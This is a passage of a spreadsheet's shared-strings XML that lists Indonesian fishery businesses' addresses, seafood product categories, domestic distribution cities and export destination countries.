    <t>Jl. DR Soedjono Lingkar Selatan RT 003, Lingkungan Mapak Indah, Kel. Jempong Baru, Kec. Sekarbela, Kota Mataram&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Anggoli, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Bawal, Kakap, Baronang, Ayam-ayam, Kurisi, Cunang)</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Makerel, Lemadang)</t>
  </si>
  <si>
    <t>Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Lencam, Anggoli, Kerapu, Jenaha, Malabar, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Australia, Japan, Singapore, United States</t>
  </si>
  <si>
    <t>Jl. A. Yani I, Dusun Carik Padang, Kel. Nyambu, Kec. Kediri, Kabupaten Tabanan&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Marlin, Gindara, Salmon)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kabupaten Bandung, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Malaysia, Myanmar, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Kol Yos Sudarso Lingkungan V, Kel. Sei Merbau, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Malong, Kambing-kambing, Biji Nangka, Layur, Bawal, Samge, Ayam-ayam)</t>
  </si>
  <si>
    <t>Cacing Laut Beku</t>
  </si>
  <si>
    <t>Ikan Asap Beku</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Bandung, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Jl. Tuna II Blok K 7 B Pelabuhan Perikanan Samudera Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Cirebon, Kabupaten Pati</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Cirebon, Kota Cirebon, Kabupaten Pati, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Chile, Norway</t>
  </si>
  <si>
    <t>Jl. Trans Sulawesi Km 52 Lingkungan VII, Kel. Pondang, Kec. Amurang Timur, Kabupaten Minahasa Selatan&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Lemuru, Tongkol, Deho, Kembung, Lemadang, Marlin, Salem, Muroaji, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Sembilang, Emperor, Kerapu, Layur, Beloso, Bawal, Kakap, Baronang, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>Pasar Botania 2 Kios Blok D No.07, Kel. Berlian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Mata Besar, Tongkol, Kembung, Sarden, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Mata Besar, Tongkol, Kembung, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Jahan, Manyung, Alu-alu, Kerapu, Lebam, Bawal, Kakap, Dingkis)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Manyung, Alu-alu, Kerapu, Lebam, Bawal, Kakap Merah, Kakap, Pari, Dingkis)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Gindara)</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Udang, Bakso Cumi-cumi, Roll Ikan, Chikuwa, Stik Kepiting Analog) </t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Bandung, Kota Depok, Kota Malang, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Nusantara RT 002 RW 004, Kel. Tanjung Balai Kota, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Manyung, Kerapu, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kabupaten Karimun</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Manyung, Kerapu, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Jl. Pattimura RT 002 RW 002 Teluk Nipah, Telaga Punggur, Kel. Kabil, Kec. Nongsa, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Mata Besar, Tongkol, Alu-alu, Kembung, Marlin, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jambi, Kota Batam, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Jl. Laks. RE. Martadinata I , Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Otak-Otak Ikan, Sosis Ikan, Kaki Naga Egg Roll Ikan)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Perum Keledang Mas Baru Blok BR/18, Kel. Sungai Keledang, Kec. Samarinda Seberang, Kota Samarinda&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Nugget Udang</t>
  </si>
  <si>
    <t>Kota Samarinda</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>France, Italy, United States</t>
  </si>
  <si>
    <t>Germany, Italy, Sweden, United States</t>
  </si>
  <si>
    <t>Cephalopoda Mentah Beku (Gurita)</t>
  </si>
  <si>
    <t>France, Germany, Italy, Sweden, United States</t>
  </si>
  <si>
    <t>Cephalopoda Rebus Beku (Gurita)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Biji Nangka, Layur, Kakatua, Kakap, Kaci-kaci, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Baby Tuna, Lemuru, Tongkol, Cobia, Kembung, Layang, Goby)</t>
  </si>
  <si>
    <t>Ikan Scombroid Beku</t>
  </si>
  <si>
    <t>Campuran Seafood Beku</t>
  </si>
  <si>
    <t>Italy</t>
  </si>
  <si>
    <t>Jl. Millennium Raya Blok L1 No.1 Kawasan Industri Millennium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Udang, Bakso Cumi-cumi, Bakso Ikan Isi, Roll Ikan, Kue Ikan, Tofu Ikan) </t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Cephalopoda Bernilai Tambah Beku (Cumi-Cumi Bentuk Cincin Beku, Cumi-Cumi Bentuk Tabung Beku, Kaki Gurita Potong Beku, Gurita Potong Beku)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya No.17 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Jl. Udang Area Muara Baru Center Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Baby Tuna, Lemuru, Kakap Putih, Bawal Hitam, Senangin, Jahan, Kuwe, Tembang, Kerapu, Layur, Bawal)</t>
  </si>
  <si>
    <t>Jl. Raya Serongga, Kel. Gunung Besar, Kec. Simpang empat, Kabupaten Tanah Bumbu&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>Kota Bekasi, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Philippines</t>
  </si>
  <si>
    <t>Jl. Amir Hamzah LK II, Kel. Tanjung Balai Kota IV, Kec. Tanjung Balai Utara, Kota Tanjung Balai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Dermaga Ujung 2 No.2 RT 001 RW 022, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Cobia, Kembung, Selayang, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Dusun IX, Desa Air Hitam, Kec. Gebang, Kabupaten Langkat&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Egypt, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Selayang, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kambing-kambing, Biji Nangka, Kerapu, Layur, Beloso, Merah, Kakap)</t>
  </si>
  <si>
    <t>Malaysia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Malong, Gulama, Lencam, Manyung, Kerapu, Layur, Kakatua, Talang-talang, Kakap Merah, Kapas-kapas, Kuro, Ekor Kuning, Seabass)</t>
  </si>
  <si>
    <t>Cephalopoda Kering (Sotong, Gurita, Cumi-cumi)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bandung</t>
  </si>
  <si>
    <t>Brunei Darussalam, China, Hong Kong, India, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Brunei Darussalam, China, Hong Kong, India, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Perancis Pergudangan Kosambi Permai Blok II 30, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Raya Cangkringmalang Km 39,4, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Belgium, Germany, Japan, United States</t>
  </si>
  <si>
    <t>Belgium, Germany, Japan, Netherlands, United States</t>
  </si>
  <si>
    <t>Jl. Abdul Kadir No.5, Kel. Gallesong Kota, Kec. Galesong , Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore</t>
  </si>
  <si>
    <t>Jl. Peternakan 2 Blok C9 No.24B RT 006 RW 007, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Korea, Republic of, Singapore, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. T. Samidan Lr. Usman Muhammad No.4A, Kel. Lamglumpang, Kec. Ulee Kareng, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>India, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Terbang, Kembung, Lemadang, Marlin, Meka, Gindara, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kerang Segar, Abalone Segar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Kuwe, Gerot-gerot, Hamachi, Makerel, Pacific Saury, Seabass, Cakalang, Herring, Kinmedai, Sarden, Gizzard Shad)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Belut Laut, Belut Jepang, Sebelah, Pufferfish, Flounder, Layur, Kakap Merah, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Righteye Flounder)</t>
  </si>
  <si>
    <t>Jl. Tukad Yeh Aya No.38, Kel. Panjer, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>China, Hong Kong</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap, Kerapu, Layur, Malong, Kurisi, Cod, Sebelah, Gerot-gerot, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap, Kerapu, Layur, Malong, Kurisi, Cod, Sebelah, Gerot-gerot, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Cakalang, Amberjack, Alaska Pollack, Japanese Butter Fish, Pacific Saury, Gizzard Shad, Barakuda, Makerel, Monkfish, Gindara, Sarden, Salem)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Cakalang, Amberjack, Alaska Pollack, Japanese Butter Fish, Pacific Saury, Gizzard Shad, Barakuda, Makerel, Monkfish, Gindara, Sarden, Salem)</t>
  </si>
  <si>
    <t>Fillet Salmon Segar</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Gurita, Cumi-cumi)</t>
  </si>
  <si>
    <t>Telur Ikan Segar, Hati Ikan Segar</t>
  </si>
  <si>
    <t>Telur Ikan Beku, Hati Ikan Baku</t>
  </si>
  <si>
    <t>Udang Segar, Kepiting Segar</t>
  </si>
  <si>
    <t>Udang Beku, Kepiting Beku,</t>
  </si>
  <si>
    <t>Fillet Salmon Beku</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Bekasi, Kota Denpasar</t>
  </si>
  <si>
    <t>Jl. Pasir Putih RT 10, Kel. Sungai Kapitan, Kec. Kumai, Kabupaten Kotawaringin Barat&lt;br&gt;Kalimantan Tengah</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Kp. Jati Parung RT 003 RW 004 No. 106, Kel. Parung, Kec. Parung, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Otak-Otak Ikan, Siomay Ikan, Ekado, Keong Mas, Kaki Naga, Lumpia Ikan, Udang Gulung, Pangsit Ikan)</t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kota Jakarta Selatan, Kota Jakarta Pusat, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Depok, Kota Semarang, Kota Tegal, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Raya Wonokoyo No.3, Dusun Laok Bindung RT 02 RW 03, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Pulau Murai Batu, Kel. Keban, Kec. Moro, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih)</t>
  </si>
  <si>
    <t>Australia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Hidup (Kakap Putih)</t>
  </si>
  <si>
    <t>Perumahan Citra Sanggalea Indah D4 No.4, Kel. Taroada, Kec. Turikale, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Denpasar</t>
  </si>
  <si>
    <t>Japan, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Japan, Singapore, Thailand</t>
  </si>
  <si>
    <t>Australia, Italy, Japan, United States</t>
  </si>
  <si>
    <t>Jl. Benteng Miring No.23, Kel. Ujung, Kec. Semampir, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna III No.1A Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Viet Nam</t>
  </si>
  <si>
    <t>Singapore, United States</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Anggoli, Kerapu, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Australia, Germany, Singapore, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Anggoli, Kerapu, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Semarang, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Australia, China, Germany, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Kembung, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Kampung Bagan RT 002 RW 009, Kel. Tanjung Piayu, Kec. Sungai Beduk, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Gedung Coolroom No.4 Kawasan Pelabuhan Muara Angke, Jl. Dermaga Muara Angke No.4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Gurita, Cumi-cumi, Sotong)</t>
  </si>
  <si>
    <t>Jl. Cakalang RT 23 No.75, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kota Balikpapan</t>
  </si>
  <si>
    <t>Abon Kepiting</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Deho, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Jl. Dullah Raya Km 8, Kel. Ngadi, Kec. Pulau Dullah Utara, Kota Tual&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Kapuk Kamal Muara VII No.73 (Room 5) , Kel. Kamal Muara , Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Baby Tuna, Tongkol, Kuwe, Kembung, Marlin, Talang-talang, Muroaji, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Pakistan, Singapore, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Lencam, Sebelah, Pisang-pisang, Manyung, Biji Nangka, Kuniran, Kerapu, Layur, Beloso, Belanak, Bawal, Kakap, Kuro, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya IV No.16, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>China, Jordan, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Lencam, Kerapu, Kakap Merah, Kurau, Kurisi)</t>
  </si>
  <si>
    <t>Kabupaten Badung, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Meka, Gindara, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Badung, Kota Denpasar</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna I No.1 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Balimong, Lencam, Angoli, Kerapu, Kakatua, Seabream, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Balimong, Lencam, Angoli, Kerapu, Kakatua, Seabream, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemadang, Marlin, Meka, Semar, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Udang No.6 Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Biji Nangka, Kerapu, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya, Kota Jayapura</t>
  </si>
  <si>
    <t>Griya Batas Kota Blok D 27 No.10, Kel. Marumpa, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Pergudangan 88 Pattene Blok AF No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Parung Poncol RT 004 RW 002, Kel. Duren Mekar, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Siomay Ikan, Udang Gulung, Naget Ikan, Kekian, Otak-otak Ikan, Kaki Naga, Lumpia Ikan, Tempura Udang, Tuna Gulung, Pempek Ikan) </t>
  </si>
  <si>
    <t>Kabupaten Karawang</t>
  </si>
  <si>
    <t>Legundi Sumo Estate A - 55, Kel. Krikilan, Kec. Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Poros Makassar - Maros, Dusun Bulutanae, Kel. Marumpa, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Barakuda, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Hong Kong, Saudi Arabia, Singapore</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Lencam, Kerapu, Kakatua, Pepetek, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Malaysia, Saudi Arabia, Singapore</t>
  </si>
  <si>
    <t>Jl. Anggrek Bukit RT 22 No.07, Kel. Air Putih, Kec. Samarinda Ulu, Kota Samarinda&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Tekwan Ikan</t>
  </si>
  <si>
    <t>Jl. Tanjung Pasir RT 21, Kel. Mamburungan, Kec. Tarakan Timur, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Sidat Hidup</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Diponegoro No.150 Blok A21, Kel. Dauh Puri Kelod, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Abalone Kering, Scallop Kering</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of</t>
  </si>
  <si>
    <t>Daging Kerang Kering</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Air Tawar Hidup (Nila, Lele, Gurame, Patin, Mas, Betutu)</t>
  </si>
  <si>
    <t>Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Goyang, Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Lemadang, Gindara, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Patin, Mola)</t>
  </si>
  <si>
    <t>Jl. Muara Baru Blok A No.1-3 RT 06 RW 07, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Sabar Jaya No.59, Kel. Perajen, Kec. Banyuasin I, Kabupaten Banyuasin&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Australia, China, France, Hong Kong, Japan, Malaysia, Singapore, Spain, Thailand, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, France, United Kingdom, United States</t>
  </si>
  <si>
    <t>Australia, Singapore</t>
  </si>
  <si>
    <t>Jl. Cendrawasih No.21, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Sarden, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Tanjung Balai, Kota Medan</t>
  </si>
  <si>
    <t>Jl. Raya Pakah Ponco, Desa Sumberagung, Kec. Plumpang, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Gresik</t>
  </si>
  <si>
    <t>Jl. Pandanlandung No.34 A, Kel. Pandanlandung, Kec. Wagir, Kabupaten Malang&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Bandung, Kota Cirebon, Kabupaten Malang, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>India</t>
  </si>
  <si>
    <t>Kota Bandung, Kota Cirebon, Kabupaten Malang, Kabupaten Pasuruan, Kota Malang, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>India, Philippines, United States, Uruguay</t>
  </si>
  <si>
    <t>Kota Bandung, Kabupaten Malang, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Tepung Jelly Rumput Laut, Tepung Puding Rumput Laut</t>
  </si>
  <si>
    <t>Kota Bandung, Kabupaten Malang, Kabupaten Pasuruan, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
